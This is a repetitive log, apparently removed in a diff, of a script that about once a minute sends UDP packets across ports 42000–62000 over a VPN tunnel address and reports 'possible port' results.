-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:31:05 -Starting port fill at 2020-09-06 06:32:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:32:07 -Starting port fill at 2020-09-06 06:33:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:33:05 -Starting port fill at 2020-09-06 06:34:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:34:04 -Starting port fill at 2020-09-06 06:35:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:35:06 -Starting port fill at 2020-09-06 06:36:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:36:05 -Starting port fill at 2020-09-06 06:37:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:37:06 -Starting port fill at 2020-09-06 06:38:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:38:05 -Starting port fill at 2020-09-06 06:39:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:39:06 -Starting port fill at 2020-09-06 06:40:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:40:06 -Starting port fill at 2020-09-06 06:41:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:41:04 -Starting port fill at 2020-09-06 06:42:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:42:04 -Starting port fill at 2020-09-06 06:43:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:43:05 -Starting port fill at 2020-09-06 06:44:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:44:06 -Starting port fill at 2020-09-06 06:45:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:45:05 -Starting port fill at 2020-09-06 06:46:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 06:46:06 -Starting port fill at 2020-09-06 06:47:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:47:05 -Starting port fill at 2020-09-06 06:48:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:48:05 -Starting port fill at 2020-09-06 06:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:49:04 -Starting port fill at 2020-09-06 06:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:50:05 -Starting port fill at 2020-09-06 06:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:51:04 -Starting port fill at 2020-09-06 06:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:52:06 -Starting port fill at 2020-09-06 06:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:53:04 -Starting port fill at 2020-09-06 06:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 06:54:05 -Starting port fill at 2020-09-06 06:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 